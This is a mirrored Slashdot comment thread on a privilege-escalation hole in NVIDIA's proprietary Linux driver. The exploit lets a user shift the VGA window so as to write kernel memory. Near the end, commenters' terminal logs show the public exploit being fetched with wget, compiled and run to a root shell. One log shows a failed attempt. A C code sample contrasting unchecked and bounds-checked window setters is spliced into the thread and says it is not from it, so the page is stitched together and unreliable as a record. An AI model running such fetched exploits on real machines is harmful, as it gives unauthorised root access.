Slashdot Mirror


Proprietary Nvidia Linux Driver Contains Privilege Escalation Hole

An anonymous reader writes "The Nvidia binary driver has been exploited by an anonymous hacker, who reported it to nvidia months ago and it was never fixed. Now the exploit was made public." The one releasing the exploit (relayed to him anonymously) is David Airlie, a well-known X hacker. The bug lets the attacker write to any part of memory on the system by shifting the VGA window; the attached exploit uses this to attain superuser privileges. It appears that this has been known to Nvidia for at least a month.

180 comments

  1. Use Windows | +5 Insightful by h910 · · Score: 5, Funny

    Use Windows and you don't get linux malware. True story, mod +5 true accordingly.

    1. Re:Use Windows | +5 Insightful by broginator · · Score: 5, Funny

      That's like saying "Drive Fords, that way you won't crash in a Chevy."

      --
      s/[stupid comments]/[intelligent discourse]/gi
    2. Re:Use Windows | +5 Insightful by Tapewolf · · Score: 4, Insightful

      Use Windows and you don't get linux malware. True story, mod +5 true accordingly.

      Since Nvidia's drivers share a large amount of common code, I'd say it's only a matter of time.

    3. Re:Use Windows | +5 Insightful by pulski · · Score: 1

      Don't feed the trolls.

      h### account name promoting Microsoft. I'm shocked!

    4. Re:Use Windows | +5 Insightful by Anonymous Coward · · Score: 0

      Wow. Microsoft's shills are actually using the subject header to try to mislead Slashdot readers into thinking the post was rated anything above the -2 it deserves*? Good gravy, everyone, this is it. THIS is what Microsoft's desperation looks like when they discover they can't buy or bully their way through the tech world any more.

      *: Yes, I know they fixed that bug a long time ago.

    5. Re:Use Windows | +5 Insightful by Anonymous Coward · · Score: 0

      You're pretty paranoid if you think that's a Microsoft shill.

      The header trick is WAY too smart for them.

    6. Re:Use Windows | +5 Insightful by Anonymous Coward · · Score: 0

      I noticed that first post on such stories usually belongs to an MS shill.

    7. Re:Use Windows | +5 Insightful by Anonymous Coward · · Score: 0

      Use windows and you will get windows malware

    8. Re:Use Windows | +5 Insightful by hlavac · · Score: 1

      Yes, Microsoft is full steam ahead on astroturfing and sockpuppeting. It's their new marketing strategy, as bribing "influencers" didn't work out so well. Next in line is probably extortion when everyone refuses to accept the Windows 8 lockdown. What will it take to stop this pit of evil madness M$ has become lately? Never thought I will say this but here goes: Bill Gates, you were such a nice, reasonable guy! We miss you!

  2. A view to a kill. by Anonymous Coward · · Score: 2, Interesting

    Shouldn't the VGA window be a window into the video memory, or at least configuration registers?

    1. Re:A view to a kill. by greg1104 · · Score: 5, Informative

      VGA maps the video card's memory into the regular CPU address space so that applications can read and write directly to it. That's the VGA window being referenced here. Removing that is further complicated by wanting to retain compatibility with older video standards (CGA, EGA).

    2. Re:A view to a kill. by causality · · Score: 3, Insightful

      Removing that is further complicated by wanting to retain compatibility with older video standards (CGA, EGA).

      ... that nobody uses anymore, at least not with PC hardware.

      --
      It is a miracle that curiosity survives formal education. - Einstein
    3. Re:A view to a kill. by Anonymous Coward · · Score: 2, Insightful

      Is this due to a very old code base in the Windows driver, and the driver code being shared between both Linux and Windows? Compatibility makes sense if you are running DOS or allowing DOS apps to function (or maybe 16-bit Windows). But I very much doubt Monochrome, CGA, EGA, and some of the old VGA standard work at all in modern Windows, and definitely not in Linux.

      This should never have been exposed to the user in linux and hopefully not in windows either. And if compatibility is a concern, then it should be through emulation and a protected path if hardware access is useful.

    4. Re:A view to a kill. by Desler · · Score: 3, Informative

      Windows 7 still includes a VGA video driver.

    5. Re:A view to a kill. by The+MAZZTer · · Score: 2

      Guess what, your computer boots right into 16-color text mode (used by the BIOS and sometimes by Windows as part of the boot sequence) using EGA colors. Not sure if that's relevant but it might be. Linux might also use something similar for its boot process and for Ctrl+Alt+Fn terminals.

    6. Re:A view to a kill. by rjr162 · · Score: 2

      That it does. Reimaged a Dell E6240 laptop using IBM's Tivoli system manager the other week, and it apparently failed at some point. Everything installed and worked except the one video driver.
      These laptops can use the built-in Intel video for battery savings and switch over to a built-in Nvidia "card" when more grunt is needed. The issue was the laptop wouldn't output video to an external monitor. I checked in Device Manager and the Nvidia card was listed as it should be, but the Intel video was listed as "generic VGA", which still allowed video to display on the laptop screen but didn't have the ability to work with an external monitor.

    7. Re:A view to a kill. by MightyMartian · · Score: 3, Interesting

      So how does Windows deal with restricting where this window can be remapped?

      --
      The world's burning. Moped Jesus spotted on I50. Details at 11.
    8. Re:A view to a kill. by hobarrera · · Score: 1

      But do we really need this backwards compatibility? Look at the supported video cards; does anyone that uses those cards need compatibility with that? The driver also required a relatively recent kernel; so again, is this compatibility required?

      I'm not trying to be ironic, I'm legitimately in doubt here.

    9. Re:A view to a kill. by hobarrera · · Score: 1

      Users wanting monochrome/CGA/EGA could just use nouveau, the only reason to use the nvidia binary blob is to support 2D/3D acceleration.

    10. Re:A view to a kill. by greg1104 · · Score: 3, Insightful

      VGA works fine in Windows and in Linux. See Linux framebuffer as a relatively modern implementation. (I say relatively modern because I'd been using Linux for a long time before it was added, and it's new compared to things like X-Windows) PC hardware is certainly not so abstracted away by useful APIs that the drivers can ignore this level of detail, to be protected from them. Manipulating this sort of thing is exactly what a driver is written to do.

      Your suggestion that this shouldn't have been exposed to the user is missing the point: this is an exploit. The driver itself needs to know all these details to properly initialize itself and support old-school text/VGA modes during boot. The user was likely never intended to have access to them, but an exploit isn't limited to what the user is supposed to do. Whether or not the path is protected or not is irrelevant if the path is bypassed.

    11. Re:A view to a kill. by shentino · · Score: 1

      Older video standards have been banned ever since KMS depended on FBCON in the kernel.

    12. Re:A view to a kill. by h4rr4r · · Score: 2

      Does the Nvidia driver even support KMS?

    13. Re:A view to a kill. by Carewolf · · Score: 1

      That used to be true, but I don't think I have owned a computer that didn't boot in VGA in almost 6 years. My latest laptop boots directly into some kind of SVGA and runs the BIOS in that. I had a screen that couldn't show low-res SVGA for some reason, and it became a bit of a problem since the screen was blank until X loaded. I had to change GRUB to switch to text mode; at least that worked, but old text modes are not used by default anymore, not even by Debian.

    14. Re:A view to a kill. by causality · · Score: 3, Insightful

      Guess what, your computer boots right into 16-color text mode (used by the BIOS and sometimes by Windows as part of the boot sequence) using EGA colors. Not sure if that's relevant but it might be. Linux might also use something similar for its boot process and for Ctrl+Alt+Fn terminals.

      Yes. When it does that, the OS has not yet loaded. Hell, the boot loader (GRUB in my case) has not yet loaded.

      It's obviously implemented in hardware. That means it has nothing to do with the nVidia driver that my OS loads up and whether that nVidia driver supports EGA.

      So okay, I'll rephrase my previous comment from "nobody uses it" to "no one needs the nVidia driver to provide it".

      --
      It is a miracle that curiosity survives formal education. - Einstein
    15. Re:A view to a kill. by sjames · · Score: 1

      There is no need whatsoever to remove that. There IS a need for the driver to not allow mmapping any other arbitrary memory range into a userspace app and to properly control access to the video memory.

    16. Re:A view to a kill. by Anonymous Coward · · Score: 0

      When I said VGA, I said old-VGA. Like the first VGA cards, before VESA. Fixed-frequency. Or other proprietary junk. This stuff is not likely going to work, at least in the framebuffer implementation, without some hacking. Most everything today has some form of VESA, so in that case, yes VGA works there. But that doesn't ignore the fact there probably is backwards compatibility for stuff that was used with DOS and PCs.

    17. Re:A view to a kill. by hairyfeet · · Score: 1

      Not to mention Nvidia hasn't been the greatest when it comes to support for old games, so I doubt one could even use that as an excuse. More likely this is just some legacy crap that nobody wanted to throw out in case somebody somewhere was actually using it. Large companies with huge legacies tend to be VERY conservative about such things because you never know when some company somewhere is running some legacy program that requires this. I wonder if AMD has those older modes baked into its driver as well?

      That said EGA and CGA haven't been mainstream in...what? Nearly 30 years? Yeah I think we can say goodbye to those by now.

      --
      ACs don't waste your time replying, your posts are never seen by me.
    18. Re:A view to a kill. by hairyfeet · · Score: 1

      My guess? Protected Path, as you would be able to bypass the DRM of services like Netflix if you could use a buffer exploit like this to gain control of the card.

      Ironically this might be one of the only times when DRM could be a benefit to the end user.

      --
      ACs don't waste your time replying, your posts are never seen by me.
    19. Re:A view to a kill. by greg1104 · · Score: 1

      VESA is a standard for setting modes and the like. Under the hood there is still the same old memory-mapped I/O as always.

    20. Re:A view to a kill. by greg1104 · · Score: 1

      Every SVGA implementation I'm aware of still maps the display buffer into main memory and then has low-level software twiddle the bits manually. Any laptop that doesn't do that I would say isn't even a "PC compatible" anymore. If it has a BIOS, it almost certainly has memory-mapped I/O into the "VGA window" alluded to here. There might be some UEFI systems that have broken this part. But a company like NVIDIA surely has to still deal with at least bootstrapping BIOS-based systems in their driver.

    21. Re:A view to a kill. by greg1104 · · Score: 1

      If you want to be able to switch from the video mode the system boots in, which is certainly some sort of memory-mapped VGA-era thing, into the fancier modes, the driver needs to worry about this. The fact that it doesn't likely do very much at all with the VGA memory before moving into something else is probably why the code is buggy; presumably it's not like they ever review this part of it anymore.

    22. Re:A view to a kill. by spitzak · · Score: 1

      It sounds like either the Nvidia driver there does not have this bug, or it does have the bug but nobody has discovered it yet.

    23. Re:A view to a kill. by Anonymous Coward · · Score: 0

      Yes, MMIO is still there. My point is not debating whether VGA as a standard works in Linux. My point is VGA/EGA/CGA used MMIO that protected/non-protected programs used because of how things worked in the past in DOS. Programs these days do not write directly to the MMIO. Even using the framebuffer, the program is not necessarily writing the MMIO directly like you would in DOS. The framebuffer in Linux would have been designed with correct access rights, being an OS designed with access protection in mind. The Nvidia driver apparently has a legacy code base that does not enforce correct access rights. Not only that, you can move the pointer and have the Nvidia driver write to arbitrary memory locations. They would not have written code for Linux today this way on purpose, so why in the world are we exposing MMIO to the user when no program (they don't even do a framebuffer for DirectFB!) would write to MMIO directly in Linux? That is what I mean: they have compatibility for something no one uses in Linux, and likely not in Windows either.

  3. Hoooo boy... by Tarlus · · Score: 4, Interesting

    With all the recent controversy and Linus and other members of the FOSS community flipping Nvidia the bird over the issue of keeping their driver closed, they're certainly going to take this news and run with it.

    --
    /* No Comment */
    1. Re:Hoooo boy... by DaveV1.0 · · Score: 0

      And, Nvidia will not care what the FOSS community does. 90+% of Nvidia's customers don't use FOSS at all. So many people forget that FLOSS is, at best, a niche market and as such has little influence on business decisions.

      --
      There is no "-1 offended" or "-1 you don't agree with me" mod options for a reason.
    2. Re:Hoooo boy... by Anonymous Coward · · Score: 5, Insightful

      Correct. That's why I choose AMD.

      Not that they're that much better, but at least they tried to.

    3. Re:Hoooo boy... by Anonymous Coward · · Score: 0

      I think Nvidia cares. But not as much for gamers as for GPGPU number crunchers.

    4. Re:Hoooo boy... by Anonymous Coward · · Score: 2, Insightful

      Nvidia's future is going to be determined almost entirely on success or failure of the Tegra line, which will predominantly run Android. That's why Linus flipped them the bird. Nvidia, as a company, is becoming increasingly dependent upon Linux to succeed financially. Yet they are not making any effort to engage developers or the community at large.

    5. Re:Hoooo boy... by serviscope_minor · · Score: 1

      FLOSS is, at best, a niche market and as such has little influence on business decisions.

      One wonders how FLOSS had little influence on the business decision to, well, support FLOSS as part of their business.

      Mysteries, mysteries.

      Also, Nvidia want go sell GPUs for HPC. Not supporting Linux is simply not an option in that market.

      --
      SJW n. One who posts facts.
    6. Re:Hoooo boy... by Anonymous Coward · · Score: 1

      I think Nvidia cares. But not as much for gamers as for GPGPU number crunchers.

      The GK104 GPU they released this year proved otherwise.

    7. Re:Hoooo boy... by rtfa-troll · · Score: 2

      . 90+% of Nvidia's customers don't use FOSS at all.

      That may be true, for all I know or care, but it's not for want of trying. As their traditional desktop market is disappearing into irrelevance, with Apple having already decided to skip Nvidia, they are desperate to get into the Android market, and without that they are in deep trouble.

      There is a real reason why their PR people were out in force in response to Linus's recent comments, and if I were investing, the fact that they failed to get traction with the community would mean I would be moving my money out of Nvidia.

      --
      =~ s,(.*),<sarcasm>$1</sarcasm>,g if any_point_you_wish();
    8. Re:Hoooo boy... by Anonymous Coward · · Score: 0

      Also, Nvidia want go sell GPUs for HPC. Not supporting Linux is simply not an option in that market.

      Sure. But NVIDIA also has no competition in the HPC market so their Linux support doesn't have to be perfect; it just needs to work better than the competition. And while exploits are serious bugs, it may take more than a month to safely patch a bug after diagnosing the cause, but this bug will get patched.

    9. Re:Hoooo boy... by ifiwereasculptor · · Score: 0

      Correct. That's why I choose AMD.

      Not that they're that much better, but at least they tried to.

      Actually they're still trying, and improvements are being made. Slowly, but steadily. The Radeon driver is miles ahead of Nouveau now. It's on its way to performance parity on older hardware (circa 2004). Nouveau, on the other hand, simply doesn't work with a card from that era (NV30-NV44 do not work with anything GTK3 - Gnome Shell, Unity and Cinnamon are all unusable). Neither does the legacy driver, by the way - it doesn't draw garbage like Nouveau, but it runs at about 0.2 fps and crashes in under a minute. As they already said they won't update the legacy driver on Nvnews, I'd say AMD's OS driver initiative is starting to pay off.

    10. Re:Hoooo boy... by Anonymous Coward · · Score: 0

      Unfortunately for NVIDIA, the driver they run on Linux is the very same that runs on Windows, THE VERY SAME. They call it Unified Driver Architecture, it's a blob of code that is the same on every platform, Linux, FreeBSD, Solaris, Windows and OSX, only the shim is different. So this bug is also exploitable on OSX and Windows, even if a public proof-of-concept is not yet available.

  4. Open Source Advantage by Nerdfest · · Score: 5, Insightful

    I'd like to say that this would not have happened with an open source driver, but that's not necessarily true. It would almost definitely have been patched by now though.

    1. Re:Open Source Advantage by Anonymous Coward · · Score: 0

      Can't do half of what I like to do with my computer using nouveau; it sucks.

    2. Re:Open Source Advantage by Dagger2 · · Score: 5, Funny

      Clearly the proprietary driver is much better then, since it allows me to do whatever I like with your computer.

    3. Re:Open Source Advantage by jedidiah · · Score: 1

      You have to get to it first. Good luck with that.

      --
      A Pirate and a Puritan look the same on a balance sheet.
    4. Re:Open Source Advantage by ilikenwf · · Score: 1

      It's hard to run GL-based apps in Wine or use VMware machines with nouveau... I've tried... that's all it lacks for me to use it all the time.

    5. Re:Open Source Advantage by Anonymous Coward · · Score: 0

      Yeah, it sucks... Can't do half of what I like to do with your computer using nouveau.

    6. Re:Open Source Advantage by Anonymous Coward · · Score: 0

      I use VMware machines with radeon driver on an AMD card. Works perfectly.

    7. Re:Open Source Advantage by hobarrera · · Score: 1

      It could have happened, and most probably would have happened at some point, but might have been spotted sooner, and would have been fixed long ago now.
      Plus, I'm sure there's plenty of other bugs/exploits we still haven't even discovered.

    8. Re:Open Source Advantage by Zontar+The+Mindless · · Score: 1

      I use VMWare almost every single day on a Linux host that employs the Nouveau drivers, and it works fine. KDE 4 desktop on the host, a bit of eye candy.

      If you're trying to use the Nouveau (or even the proprietary) drivers *inside* a VMware guest, that's just silly, and I really hope that's not what you meant.

      --
      Il n'y a pas de Planet B.
    9. Re:Open Source Advantage by Anonymous Coward · · Score: 0

      While it's fair to point out that nouveau does lack many features of the blob, it is also fair to say that nouveau is awesome, getting better all the time and already has a huge advantage over the official driver being Free software.

    10. Re:Open Source Advantage by Zontar+The+Mindless · · Score: 1

      Crap. s/VMware/VirtualBox/

      (I do NOT use VMware. There being little point in doing so when VBox is free as in beer AND in speech and just plain works better.)

      --
      Il n'y a pas de Planet B.
    11. Re:Open Source Advantage by makomk · · Score: 1

      It wouldn't have happened with an open source driver because Linus wouldn't have allowed such a foolish feature into the kernel. The open source drivers have quite complicated - and unfortunately somewhat performance-sapping - in-kernel checks on any interaction with the GPUs in order to stop attackers from doing exactly this kind of thing.

    12. Re:Open Source Advantage by jedidiah · · Score: 1

      Talk is cheap. You still haven't said how you are going to get to my box to use this.

      THAT is the subtle difference between a bug and something that manages to cripple the entire Internet.

      Bad? Sure. Dire? Not so much.

      --
      A Pirate and a Puritan look the same on a balance sheet.
    13. Re:Open Source Advantage by FormOfActionBanana · · Score: 1

      Eric S. Raymond's "Many Eyes" theory has really not stood the test of time. Some research has indicated the security defect rate between open and closed commercial software is about the same (i.e. it relates to your languages and your developers' security skill levels, not to the number of POTENTIAL code reviewers). Open source code and vulnerabilities sit in plain view for years without public discovery.

      What has been shown is that sometimes, commercial operations have a framework standing by to deal with security problems when they arise. In this case, it doesn't appear NVidia's security response team was doing anything but who knows. The fact of the matter is non commercial open source projects have such a security incident response team much less often. The Apache project is a good exception.

      Disclaimer: I do this for my day job!

      --
      Take off every 'sig' !!
  5. Re:Who did he send it to at Nvidia? by Anonymous Coward · · Score: 5, Insightful

    Maybe people need to stop being apologists for this kind of thing...

    Companies don't just hand out the email address for the head of their SW development division; maybe if they did we could let the right people know. I emailed a random Joe when I found an issue with a site, and it got escalated up and it got fixed.

    Maybe if Nvidia had better quality random Joes, when this sort of stuff did pass by them it would get escalated and not deleted.

  6. Nvidia rotten to the core by Jerry+Atrick · · Score: 2, Insightful

    Nvidia are just serial fuckups. Wasted half my Saturday trying to find a driver release that would work on my wife's Kubuntu 11 PC. Eventually gave in and upgraded to 12.04 instead of manually erasing the broken install yet again... to find another fscking broken driver and no X. These idiots are completely incompetent and simply don't respond to error reports or much of anything else from ordinary users.

    Nvidia, still haven't forgotten all the accelerated functions in your chipsets that gradually got turned off as drivers updated, because the hardware was rotten to the core and couldn't be made to work. Or the ongoing multi-year saga of begging for working PAL TV support, all of it falling on deaf ears. Or the magically vanished TV-out support when Vista shipped.

    Frankly a root exploit is one of their lesser sins.

    1. Re:Nvidia rotten to the core by ilikenwf · · Score: 0, Troll

      If you ran a distro that didn't suck, you wouldn't be having issues... Archlinux, gentoo, slackware...I mean, Arch would work best for you here - you just "yaourt -S nvidia-beta-all" and done.

    2. Re:Nvidia rotten to the core by interval1066 · · Score: 1

      Frankly a root exploit is one of their lesser sins.

      Then their cardinal sins must be Hitlerian; (from David Airlie's write-up)

      It basically abuses the fact that the /dev/nvidia0 device accepts changes to the VGA window and moves the window around until it can read/write to somewhere useful in physical RAM, then it just does a priv escalation by writing directly to kernel memory.

      It doesn't take a lot of thought to understand the implications of the hole. And it smacks of pure laziness on the part of nVidia.

      --
      Python: 'And then suddenly you have a language which says "we're all stuck with whatever the whiniest coder wants".'
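The window-placement check that sjames's comment earlier in the thread calls for, and that the write-up quoted above describes as missing, as an added example in C that is not from this thread or from NVIDIA's driver: a caller-controlled VGA window offset is shown first programmed as-is, then rejected unless the whole window stays inside video memory. The gpu_dev struct, the 128 KiB window size, the 4 KiB alignment and every function name are assumptions constructed for illustration.

```c
#include <errno.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical, simplified model of a GPU that exposes its video memory
 * through a BAR and lets a caller relocate a legacy VGA aperture ("VGA
 * window") within it. Constructed for illustration only. */
#define VGA_WINDOW_SIZE   (128u * 1024u)   /* size of the legacy 0xA0000-0xBFFFF span */
#define WINDOW_ALIGN      4096u            /* assumed page alignment for the window */

struct gpu_dev {
    uint64_t vram_size;      /* bytes of video memory behind the BAR */
    uint64_t window_offset;  /* current VGA window offset into VRAM */
};

/* Vulnerable pattern: the caller-supplied offset is programmed unchanged,
 * so a window placed past the end of VRAM aliases whatever lies beyond it. */
int set_vga_window_unchecked(struct gpu_dev *dev, uint64_t offset)
{
    dev->window_offset = offset;
    return 0;
}

/* Hardened pattern: the window must be aligned and lie entirely inside
 * VRAM, and the range arithmetic must not overflow. */
int set_vga_window_checked(struct gpu_dev *dev, uint64_t offset)
{
    if (offset % WINDOW_ALIGN != 0)
        return -EINVAL;
    /* Subtract from the limit instead of computing offset + size, which
     * could wrap around for a very large offset. */
    if (dev->vram_size < VGA_WINDOW_SIZE ||
        offset > dev->vram_size - VGA_WINDOW_SIZE)
        return -EINVAL;
    dev->window_offset = offset;
    return 0;
}

/* The invariant a reviewer would check after any window move:
 * [window_offset, window_offset + VGA_WINDOW_SIZE) is inside VRAM. */
bool window_inside_vram(const struct gpu_dev *dev)
{
    return dev->window_offset <= dev->vram_size &&
           dev->vram_size - dev->window_offset >= VGA_WINDOW_SIZE;
}

int main(void)
{
    /* Constructed device: 64 MiB of VRAM, window initially at offset 0. */
    struct gpu_dev dev = { .vram_size = 64ull * 1024 * 1024, .window_offset = 0 };
    uint64_t past_end = dev.vram_size + 0x100000;   /* constructed: 1 MiB past VRAM */

    set_vga_window_unchecked(&dev, past_end);
    printf("unchecked: window inside VRAM? %s\n",
           window_inside_vram(&dev) ? "yes" : "no");

    dev.window_offset = 0;
    int rc = set_vga_window_checked(&dev, past_end);
    printf("checked: rc=%d, window inside VRAM? %s\n", rc,
           window_inside_vram(&dev) ? "yes" : "no");
    return 0;
}
```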
    3. Re:Nvidia rotten to the core by Anonymous Coward · · Score: 3, Insightful

      Seriously? This is the kind of shit that makes people hate us Linux users. "Oh, you had a problem? Should have used $MY_FAVORITE_DISTRO then it would have worked! (Unless it still didn't, but let's just ignore that possibility so I can be a smug bastard.)"

    4. Re:Nvidia rotten to the core by Anonymous Coward · · Score: 0

      shoudlnt run linux nube go to windows.

    5. Re:Nvidia rotten to the core by Fwipp · · Score: 1

      I recommend booting from a LiveCD before installing so you can see if the drivers work.

    6. Re:Nvidia rotten to the core by Jerry+Atrick · · Score: 4, Informative

      Frankly a root exploit is one of their lesser sins.

      Then their cardinal sins must be Hitlerian; (from David Airlie's write-up)

      You forget the episodes like their broken hardware accelerated NIC, that dropped random bits.

      First they spent months claiming there was no bug.
      Then they spent months claiming they'd fixed it (they hadn't).
      Then they claimed they'd fixed it when they'd actually just disabled the acceleration and fallen back to software!

      Over a year of data loss for anyone that believed them.

      Same thing happened with their attempt at accelerated sound hardware. And pretty much everything else they've tried accelerating apart from GPUs. GPUs have a whole different class of problems to do with not listening to feedback.

    7. Re:Nvidia rotten to the core by fuzzyfuzzyfungus · · Score: 5, Insightful

      Somebody should probably tell Nvidia that a driver that enables arbitrary memory read/write could probably be used as a DRM circumvention mechanism if targeted at a 'protected' program rather than the kernel. That might actually get them to fix it...

    8. Re:Nvidia rotten to the core by hobarrera · · Score: 1

      In your particular case, the issue is Ubuntu, which does not ship the driver properly or have any simple way of installing it, and not Nvidia. You'd better use a distro that actually supports it, or use hardware (and driver) your distro completely supports.

    9. Re:Nvidia rotten to the core by hobarrera · · Score: 2

      His advice makes sense.
      You bought hardware from a company unwilling to document its hardware and unwilling to release its drivers, installed a distro that opts for FLOSS drivers, and then complained the combination didn't work. Of course it didn't; you can't just have ANY software run with ANY hardware perfectly as you expect it to.

    10. Re:Nvidia rotten to the core by gl4ss · · Score: 2

      haha, that's a fucking classic.

      makes me laugh almost as hard as believing that I'd get video decoding support in gpu when I bought a gf 6800 back in the day(you know, because it said so on the box). "In late 2005, an update to Nvidia's website finally confirmed what had long been suspected by the user community: WMV-acceleration is not available on the AGP 6800. Of course, today's standard computers are fast enough to play WMV9 video and other sophisticated codecs like MPEG-4, H.264 or Theora without hardware acceleration." (I'm just kidding, I didn't believe them to have actually working acceleration for video decode when I bought them, I did however think that they'd get it sorted out in the drivers for some random video player program to use.. never happened).

      --
      world was created 5 seconds before this post as it is.
    11. Re:Nvidia rotten to the core by Anonymous Coward · · Score: 0

      He's not running some obscure distro called Gnu/Wierdo Linux, it's friggin Kubuntu, which is Ubuntu with KDE. An Nvidia card ought to work if it will work at all on Linux. And if it wouldn't, then Nvidia shouldn't claim to support Linux.

      And you're ignoring the fact that Nvidia's support still sucks.

    12. Re:Nvidia rotten to the core by Anonymous Coward · · Score: 0

      And you're ignoring the fact that Ubuntu is the Mac OS 9 of Linux.

    13. Re:Nvidia rotten to the core by Anonymous Coward · · Score: 0

      Are you sure this isn't Kubuntu's fault? Because I've been running many versions of Slackware over the years, with many nvidia cards and many versions of their drivers, and I never had a combination that didn't just instantly work perfectly.

    14. Re:Nvidia rotten to the core by Anonymous Coward · · Score: 0

      Go home troll. You're in the wrong neighborhood.
      (Captcha: Impress... This shit just keeps happening xD)

    15. Re:Nvidia rotten to the core by Anonymous Coward · · Score: 1

      Will you be quiet!?! Geez.

    16. Re:Nvidia rotten to the core by Anonymous Coward · · Score: 2, Insightful

      Oh, please!

      I've re-written the installers for NVidia's binary blobs and library mangling several times, and sent the fixes to NVidia. The problem is that the installer moves aside the existing OpenGL libraries and creates symlinks to their *own* proprietary libraries, and doesn't inform the local package management system of the change. So updates break it, and the installer gets very confused if you try to run it with a new installer and haven't cleared the old installer.

      Cleaning up after the resulting mess is awkward, unless someone has thoughtfully bundled it for you into some more sane package. And that's a lot of work to fix something that NVidia keeps breaking in new and creative ways with very, very bad shell scripting.

    17. Re:Nvidia rotten to the core by Carewolf · · Score: 3, Informative

      I think they might have a culture of not listening. The chief maintainer of Nvidia's official forums posted, after Linus's outburst, a series of posts about how Linus's complaints had caused "him and his family severe grief", and that Linus should shut up, and would not be welcome on the forum, and that anybody talking about his comments would be banned.

      Jesus christ, that guy needs serious help, but it might be an institutional problem. Maybe they are taught that any complaints about Nvidia are actually mortal stains on their honour as employees of Nvidia??

    18. Re:Nvidia rotten to the core by hobarrera · · Score: 1

      Ubuntu goals are to support and promote free software, NOT to provide support for every fancy 3D feature; there's no reason for them to support nvidia's driver if there's a free alternative.
      If you want to use that driver, you'd be better off finding an OS that matches your philosophy.

    19. Re:Nvidia rotten to the core by Anonymous Coward · · Score: 1

      Nvidia are just serial fuckups. Wasted half my Saturday trying to find a driver release that would work on my wife's Kubuntu 11 PC. Eventually gave in and upgraded to 12.04 instead of manually erasing the broken install yet again... to find another fscking broken driver and no X. These idiots are completely incompetent and simply don't respond to error reports or much of anything else from ordinary users.

      So, I have to ask, and I mean this earnestly: what chipset vendor do you recommend? I find ATI completely fucked up and unacceptable with respect to driver quality (and no, they haven't improved), and Intel just doesn't have the performance.

    20. Re:Nvidia rotten to the core by chmod+a+x+mojo · · Score: 2

      Who the FUCK modded you Insightful?

      Sonovabitch, why do the retards ALWAYS come out the one day I don't have mod points?

      --
      To err is human; effective mayhem requires the root password!
    21. Re:Nvidia rotten to the core by Rich0 · · Score: 1

      A new ultra-critical patch to the Nvidia drivers has been installed (no, we didn't ask you about it first).

      We fixed a serious security problem, and now the system will ensure that access to memory in multimedia and copy-protected applications cannot be circumvented. Such access is limited to less critical data such as credit card and banking data, the password database, and kernel memory in general (for areas that do not handle media pathways).

    22. Re:Nvidia rotten to the core by fuzzyfuzzyfungus · · Score: 1

      Unlikely in their Linux driver, and I'm not sure how the 'Protected Media Path' is doing in Win7; but in Vista's PMP implementation a driver bug of this flavor (especially in the GPU, since that needs to enforce OPM restrictions) could theoretically lead to cryptographic revocation of the driver...

      "If a trusted component in the PE becomes compromised, after due process it will be revoked. However, Microsoft provides a renewal mechanism to install a newer trusted version of the component when one becomes available."

      In Linux, I don't think that this bug gives you any greater control than root would ordinarily have through /dev/mem; it's just a major issue because only root is supposed to have that, and even they are generally advised not to mess with it.

    23. Re:Nvidia rotten to the core by Rich0 · · Score: 1

      Yeah, I doubt even MS is going to revoke the Nvidia driver's certificate, unless they have a way to revoke it only for use with PMP but not with stuff like booting up and having better than 640x480 resolution. You're talking about a major disruption to half of the consumer PCs on the planet.

      I could just see the I'm a Mac ads after that.

    24. Re:Nvidia rotten to the core by fuzzyfuzzyfungus · · Score: 1

      In practice, I suspect that the 'after due process' part includes "Will this piss off millions of our customers?"; but it is my understanding that revocation can be confined to just preventing the driver from being part of any 'trusted' zone in the PMP (which, in the case of the GPU, would pretty much break playback of material that requires the presence of a PMP entirely, since the GPU driver is both highly privileged and responsible for HDCP output handling; but it wouldn't break non-PMP graphics stuff).

  7. works here by Anonymous Coward · · Score: 5, Informative

    It's certainly legit..

    c@v:~$
    c@v:~$ wget http://cache.gmane.org//gmane/comp/security/full-disclosure/86747-001.bin ...
    2012-08-01 12:46:13 (60.8 KB/s) - `86747-001.bin' saved [18225/18225] ...
    c@v:~$ mv 86747-001.bin nvid-root.c
    c@v:~$ gcc nvid-root.c -o nvid-root
    c@v:~$ ./nvid-root
    [*] IDT offset at 0xc1808000
    [*] Abusing nVidia...
    [*] CVE-2012-YYYY
    [*] 32-bits Kernel found at ofs 0
    [*] Using IDT entry: 220 (0xc18086e0)
    [*] Enhancing gate entry...
    [*] Triggering payload...
    [*] Hiding evidence...
    [*] Have root, will travel..
    sh-4.2#
    sh-4.2#

    sh-4.2# id
    uid=0(root) gid=0(root) groups=0(root),4(adm),6(disk),20(dialout),24(cdrom),29(audio),44(video),46(plugdev),104(fuse),105(lpadmin),115(admin),116(sambashare),119(pulse-access),1000(chad)
    sh-4.2#

    sh-4.2# lsb_release -a
    LSB Version: core-2.0-ia32:core-2.0-noarch:core-3.0-ia32:core-3.0-noarch:core-3.1-ia32:core-3.1-noarch:core-3.2-ia32:core-3.2-noarch:core-4.0-ia32:core-4.0-noarch
    Distributor ID: Ubuntu
    Description: Ubuntu 12.04 LTS
    Release: 12.04
    Codename: precise

    sh-4.2# uname -a
    Linux vero 3.2.0-24-generic-pae #39-Ubuntu SMP Mon May 21 18:54:21 UTC 2012 i686 i686 i386 GNU/Linux
    sh-4.2#

    1. Re:works here by dmitrygr · · Score: 5, Informative

      64-bit 2.6.38.8 kernel with nvidia driver 280.13 doesn't work:

      [*] IDT offset at 0xffffffff81b60000
      [*] Abusing nVidia...
      [*] CVE-2012-YYYY
      [*] 64-bits Kernel found at ofs 0
      [*] Using IDT entry: 220 (0xffffffff81b60dc0)
      [*] Enhancing gate entry...
      [*] Triggering payload...
      [*] Hiding evidence...
      callsetroot returned fffffffffffffffe (-2)
      [*] Failed to get root.

      --
      -------
      1. Enjoy your job
      2. Make lots of money
      3. Work within the law

      Choose any two.
    2. Re:works here by Anonymous Coward · · Score: 0

      me@mine:~$ wget http://cache.gmane.org//gmane/comp/security/full-disclosure/86747-001.bin
      me@mine:~$ mv 86747-001.bin nvid-root.c
      me@mine:~$ gcc nvid-root.c -o nvid-root
      me@mine:~$ ./nvid-root
      [*] IDT offset at 0xffffffff81e35000
      [*] Abusing nVidia...
      [*] CVE-2012-YYYY
      [*] 64-bits Kernel found at ofs 0
      [*] Using IDT entry: 220 (0xffffffff81e35dc0)
      [*] Enhancing gate entry...
      [*] Triggering payload...
      [*] Hiding evidence...
      callsetroot returned fffffffffffffffe (-2)
      [*] Failed to get root.
      me@mine:~$ uname -a
      Linux foofoo 3.1.10-1.16-desktop #1 SMP PREEMPT Wed Jun 27 05:21:40 UTC 2012 (d016078) x86_64 x86_64 x86_64 GNU/Linux
